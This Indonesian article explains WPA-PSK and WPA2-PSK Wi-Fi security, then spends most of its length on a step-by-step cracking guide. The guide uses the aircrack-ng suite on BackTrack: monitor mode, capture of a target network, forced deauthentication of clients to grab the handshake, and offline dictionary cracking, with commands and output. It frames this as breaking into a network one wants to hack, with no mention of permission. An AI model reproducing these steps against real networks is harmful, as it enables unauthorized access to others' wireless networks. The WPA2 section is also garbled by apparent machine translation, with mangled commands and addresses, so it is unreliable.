1. WPA-PSKWPA-PSK (Wi-Fi Protected Access – Pre Shared Key) adalah pengamanan jaringan

nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA  tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

2. WPA2-PSKWPA2-PSK adalah security terbaru untuk wireless, dan lebih bagus dari WEP dan WPA-

PSK, tetapi masih bisa untuk dicrack atau disadap tetapi sangat memakan banyak waktu.  Dalam WPA2-PSK ada dua jenis decryption, Advanced Encryption Standard (AES) dan Temporal Key Integrity Protocol (TKIP). TKIP banyak kelemahan oleh itu lebih baik anda gunakan AES. Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa).3. CARA KERJA WPA-PSK DAN WPA2-PSK

pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES.

Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

4. PERBEDAAN WPA-PSK DENGAN WPA2-PSKWPA-PSK WPA-PSK adalah security yang lebih update dari WEP. WPA-PSK mempunyai decryption yang ada pada WEP. Malah ia menambahkan security yang lebih pada wireless anda. WPA-PSK masih bisa dicrack atau disadap, tetapi mengambil masa lebih lama dari WEP. Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa).WPA2-PSK memakai sistem Advanced Encryption Standard (AES) dan Temporal Key Integrity Protocol (TKIP) Panjang key adalah 8-63, anda boleh memasukkan sama ada 64 hexadecimal atau ASCII(seperti biasa).

5. CARA CRAK ATAU BOBOL

A. WPA-PSKTrik ini menggunakan Backtrack OS Linux, masuk keterminal dan lakukan printah :

1. root@bt:-# airmon-ng

2. root@bt:-# airmon-ng stop wlan0

3. root@bt:-# airmon-ng start wlan0

4. root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)

5. root@bt:-# airodump-ng -c 6 -w zhome –bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka terminal kedua dan ketikan)

6. root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)

7. root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de adalah dictionary passpharase bawaan backtrack)

B. WPA2-PSK

1. Masukkan antarmuka mode monitor 2. Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key) 3. Ambil semua paket 4. Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan

yang dapat ditangkap 5. Crack tombol menggunakan file kamus (atau melalui John The Ripper) 6. Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel

untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0. Pertama, memasukkan kartu ke dalam mode monitor: root @ bt: ~ # airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root @ bt: ~ # airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (Monitor mode diaktifkan pada mon0)

7. Temukan jaringan nirkabel yang menggunakan WPA2 / PSK:  root @ bt: ~ # airodump-ng mon0 CH 6] [TERPAKAI: 4 s] [2009/02/21 00:57 BSSID PWR Beacons # Data, # / s CH MB AUTH ESSID Cipher enc 00:19:05 B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Lost Tingkat Probe Paket 00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -29 0-1 12 4 TestNet 

8. Berhenti airodump-ng dan jalankan lagi, menulis semua paket ke disk: mon0 airodump-ng - channel 10 - 00:19:05 bssid B: 52: AD: F7-w / tmp/wpa2

9. Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac dari klien yang terhubung (-c) root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3 13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7) pada saluran 10 Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK] Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7 BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc 00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Lost Tingkat Probe Paket 00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230 

10. Berhenti airodump-ng dan pastikan file diciptakan dengan benar root @ bt: / # ls / tmp/wpa2 *-al Rw-r - r - 1 root root 35189 2009/02/21 13:04 / tmp/wpa2-01.cap Rw-r - r - 1 root root 476 2009/02/21 13:04 / tmp/wpa2-01.csv Rw-r - r - 1 root root 590 2009/02/21 13:04 / tmp/wpa2-01.kismet.csv 

11. Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan, tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik waktu. Opsi pertama adalah dengan menggunakan worklist suatu / file drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan dalamnya fie tutup yang berisi Handshake WPA2.. Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat menjalankan :aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi * 

12.Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama sekali. 

REFERENSI

- http://raytkj.blogspot.com/2012/05/perbedaan-security-wireless-wpa-wpa2.html

- http://jempol-jempolan.blogspot.com/2011/12/cara-crack-wi-fi-wpa-dan-wpa2-psk.html

- http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64

- http://youngndifferent.blogspot.com/2012/12/pengertian-wep-wpa-wpa2-psk-dan.html

- http://www.alongrhs.co.nr/